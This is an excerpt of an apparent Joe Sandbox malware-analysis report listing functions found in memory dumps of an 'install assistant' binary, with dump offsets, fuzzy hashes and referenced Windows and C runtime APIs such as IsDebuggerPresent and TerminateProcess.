                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID:
                                        • API String ID: 4218353326-0
                                        • Opcode ID: e70c4893993b9ee201da32e9db9c0a8108314e45a563698f2a49cb4cd639d411
                                        • Instruction ID: d704788b47791c77e4f28104e4a6fcfd9491932ce241d1e2e708750685ac3d2b
                                        • Opcode Fuzzy Hash: e70c4893993b9ee201da32e9db9c0a8108314e45a563698f2a49cb4cd639d411
                                        • Instruction Fuzzy Hash: 2153CE71745B01CFC728CF2CC8D0A95B7E2EF95318B598A2DC0D68BA65EB74B54ACB40
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD64CE5
                                          • Part of subcall function 6CD3AC2A: __EH_prolog.LIBCMT ref: 6CD3AC2F
                                          • Part of subcall function 6CD3C6A6: __EH_prolog.LIBCMT ref: 6CD3C6AB
                                          • Part of subcall function 6CD64A0E: __EH_prolog.LIBCMT ref: 6CD64A13
                                          • Part of subcall function 6CD64837: __EH_prolog.LIBCMT ref: 6CD6483C
                                          • Part of subcall function 6CD68143: __EH_prolog.LIBCMT ref: 6CD68148
                                          • Part of subcall function 6CD68143: ctype.LIBCPMT ref: 6CD6816C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog$ctype
                                        • String ID:
                                        • API String ID: 1039218491-3916222277
                                        • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                        • Instruction ID: 2642f2b600790620fe3feb18413f491860d438456750b227ec267561c960d034
                                        • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                        • Instruction Fuzzy Hash: A703AE30905258EFDF11CFA5C954BDDBBB0AF16308F2440DAD44967BA2EB346B89CB61
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CD0F099
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CD0F0A3
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CD0F0B0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 10eeb88016d3e4b7ad872626e6e1b8f02229ca2539fba3b070cf38a2e5ec9cb6
                                        • Instruction ID: d22325548cba2c2654cb0d884fba57788c5dfd94a82e85062c70f97d91caed78
                                        • Opcode Fuzzy Hash: 10eeb88016d3e4b7ad872626e6e1b8f02229ca2539fba3b070cf38a2e5ec9cb6
                                        • Instruction Fuzzy Hash: 6F31A974A01218DBCB21DF69D8887CDB7B8BF48314F5041EAE51CA72A0EB749B858F94
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,6CD0E055,6CD08A69,00000003,00000000,6CD08A69,00000000), ref: 6CD0DFBF
                                        • TerminateProcess.KERNEL32(00000000,?,6CD0E055,6CD08A69,00000003,00000000,6CD08A69,00000000), ref: 6CD0DFC6
                                        • ExitProcess.KERNEL32 ref: 6CD0DFD8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 59c198bb8433b3b104fa48d92685f25b98dc4f1cc4888624649c7926afa68361
                                        • Instruction ID: e210cb2712771a1170763da0035a308e957d995eac6de99959e097b28dcc18d2
                                        • Opcode Fuzzy Hash: 59c198bb8433b3b104fa48d92685f25b98dc4f1cc4888624649c7926afa68361
                                        • Instruction Fuzzy Hash: A1E0B631604148EBDF126F59D90CA993FB9FB86359B118415F909CAA32CB35D992CB90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: x=J
                                        • API String ID: 3519838083-1497497802
                                        • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                        • Instruction ID: 589e766d29cb00415277a5df01193aae41dfad282f75b43d1fff76a2cd000d4a
                                        • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                        • Instruction Fuzzy Hash: 8E91F332D11539EACF04DFA4C990AEDB7B1BF4730CF11A06AE459A7A70DB31594ACB60
                                        APIs
                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CD066D0
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CD06EF3
                                          • Part of subcall function 6CD08199: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CD06EDC,00000000,?,?,?,6CD06EDC,?,6CD3354C), ref: 6CD081F9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                        • String ID:
                                        • API String ID: 915016180-0
                                        • Opcode ID: 26f72bd9d5852010bda7b8aeb9eca0611e7b3666f8c847ebd7626c177425a895
                                        • Instruction ID: e198fb6af175c4eea2f8ddfa0a1c8dc9e9f469c66433c572c332736e3a92d31e
                                        • Opcode Fuzzy Hash: 26f72bd9d5852010bda7b8aeb9eca0611e7b3666f8c847ebd7626c177425a895
                                        • Instruction Fuzzy Hash: C5B18C71B00205DBDB04CFA9C8C169DBBF5FB45328F24822EE826EB6A1D7759554CFA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @4J$DsL
                                        • API String ID: 0-2004129199
                                        • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                        • Instruction ID: 7266221c69ca5811c7130e4f87bd46c1db80771b2bfe725eac8fb9a3a613a115
                                        • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                        • Instruction Fuzzy Hash: B3219E37AA48564BD74CCB28EC33EB92690E744305B89527EE94BCB3E1DF6C9800C648
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD5340F
                                          • Part of subcall function 6CD54137: __EH_prolog.LIBCMT ref: 6CD5413C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                        • Instruction ID: 972c56838ca6a9e48c09f0437c90aa20159a476c5c9433d56d499a570741d918
                                        • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                        • Instruction Fuzzy Hash: A2629B71D00259CFDF15CFA8C890BEDBBB1BF04308F54406AE915ABAA0D7749A65CFA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: YA1
                                        • API String ID: 0-613462611
                                        • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                        • Instruction ID: 1ad08f944abb0d71440666eba8f928b4c180e33a74f1b4a02a481d0557784ec3
                                        • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                        • Instruction Fuzzy Hash: 9B42B1706093859FC315DF68C49069ABBE2EFD9308F14496DE4D68B7A1D732D907CB82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aullrem
                                        • String ID:
                                        • API String ID: 3758378126-0
                                        • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                        • Instruction ID: 562ca5bc1a07f9ec78bcaf629a2009429729e9fe0c347af39887924c1f8d33c5
                                        • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                        • Instruction Fuzzy Hash: 5B51E871A042559BD711CF5AC4C02EEFBF6EF7A214F18C05EE88897282D27A5D9AC760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                        • Instruction ID: fdbe912f8acd48c52888ad563e50e737425c6f00f258e1f02cf10030c31efd73
                                        • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                        • Instruction Fuzzy Hash: 02029EB1608342CBD324CF28C89079EBBE2BFC8358F144A2EE5C6A7761D7749945CB52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (SL
                                        • API String ID: 0-669240678
                                        • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                        • Instruction ID: 74c17635853478a838e5bc547d32a00e159171de975684b1db08c98c39675647
                                        • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                        • Instruction Fuzzy Hash: 0F516373E208214AD78CCF24DC2177572D2E784310F8BC1B99D8BAB6E6D978A89587D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x5l
                                        • API String ID: 0-1778584636
                                        • Opcode ID: 94ced87054a7a6b4f7ce3cb2aca3b8601e84360bacfe7c9f23cad21bbf906ed1
                                        • Instruction ID: aee05007b7c49a3cb2b9b1dd0ef1006cb656e0a3c39a04b4cbad04ab9884d549
                                        • Opcode Fuzzy Hash: 94ced87054a7a6b4f7ce3cb2aca3b8601e84360bacfe7c9f23cad21bbf906ed1
                                        • Instruction Fuzzy Hash: E0F03071A19224EBCB12CB48E906F9A73B8EB45B65F12009BE5419BA60D7B0DE40C7D0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                        • Instruction ID: 6e41d22f796cd5a504466f173f12198c3b6c9569afc7653eb67aaa5568f8b01d
                                        • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                        • Instruction Fuzzy Hash: 46524F71204B418BD718CF69C49066ABBE2BF95308F148A2DD4DAC7F61DB74F85ACB81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                        • Instruction ID: aeef04375fd8d310ad809ede5ca3cfc6fc01c07a5b9a2f6ad15145d1631b40d0
                                        • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                        • Instruction Fuzzy Hash: 8F62E2B1A08345CFC714CF19C98091AFBE9BBC8748F248A2EE89997725D771E845CB53
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                        • Instruction ID: f7ba563ae747b9eee8e6401bb5da7d6d371508ad475a30820471cfee84a93f78
                                        • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                        • Instruction Fuzzy Hash: B6129DB22097418FC718CF28C49466AFBE2BF88348F54892DE99B97B61D731E845CB51
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                        • Instruction ID: 2c7de993b8fb81ff06eac0e3115c0b9a43348ea289e9f0483406f9a00e5e41b6
                                        • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                        • Instruction Fuzzy Hash: F902D772B083128BC319CF28C4C4269BBF6FBC4359F151B2EE89697A64D7749845CB93
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                        • Instruction ID: 1a35c0e545b95214cef5067e021837ba6815b70db208636a9c1f48a15b0605a6
                                        • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                        • Instruction Fuzzy Hash: 6DF1FF726042888BEB24CFA8D8907EEB7E2FBC5304F544539DC89CBB51DB35964AC791
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                        • Instruction ID: 3f4f445156bf654b361bc790d55109ff143730b0e90450e324e660d72dd65de8
                                        • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                        • Instruction Fuzzy Hash: 11D110B15046168FD718DF1CC4A4236BBE1FF86304F054ABDDAA79B3AAD7349605CB40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                        • Instruction ID: d1a77146ef5ed263d356bdd4bd0d938e46dd9ff730b9f00a297ce5c4d08f1cf3
                                        • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                        • Instruction Fuzzy Hash: F1C1D2B52047818BC718DF39D1A029BBBE2AFDA354F148A6DC4CA4BB65DA30B40DCB55
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                        • Instruction ID: 0cb13956fad1f9d6b0f566384674ec7aa5846ffc83fd8c5d49103c2f7662b01a
                                        • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                        • Instruction Fuzzy Hash: 83B1D631305B058BD324EFB9C8907EBF7E1AF84318F04452DC59A87761EF72A50A87A5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                        • Instruction ID: ffd688ee526574dd184058d5f5be30d668dde42f8a434b18d110a2ce20fa9901
                                        • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                        • Instruction Fuzzy Hash: 8FB1BE756047028BC304DF69C8806ABF7E2FFC8304F14896DD499C7725E771A55ACBA6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                        • Instruction ID: bbdd37d226e99967c08f4e2ba6944c80229f6201ed9b17b56c14fa7e61b29669
                                        • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                        • Instruction Fuzzy Hash: 40A106B160C3419FC314CF29C4906AABBE1AFD5308F564A2DE4DBE7B60D631E945CB62
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                        • Instruction ID: afd72b395edbe82b99bbc4f1e42009f6690d3f04e4f741f09c8d1becfbd788ca
                                        • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                        • Instruction Fuzzy Hash: CC81B075A047018FC320DF29C080646F7E1FF99704F29CA6DC59A9B721E772E946CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
